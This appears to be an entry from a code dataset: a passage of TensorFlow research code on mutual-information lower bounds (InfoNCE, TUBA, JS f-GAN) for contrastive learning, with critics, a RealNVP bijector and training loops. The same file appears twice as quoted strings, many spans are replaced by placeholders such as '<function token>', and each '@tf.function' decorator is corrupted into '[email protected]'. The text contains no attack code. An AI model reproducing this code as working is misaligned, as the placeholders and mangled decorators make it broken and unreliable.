logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else 
layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n 
self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n 
='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the 
estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n 
self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return 
self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, 
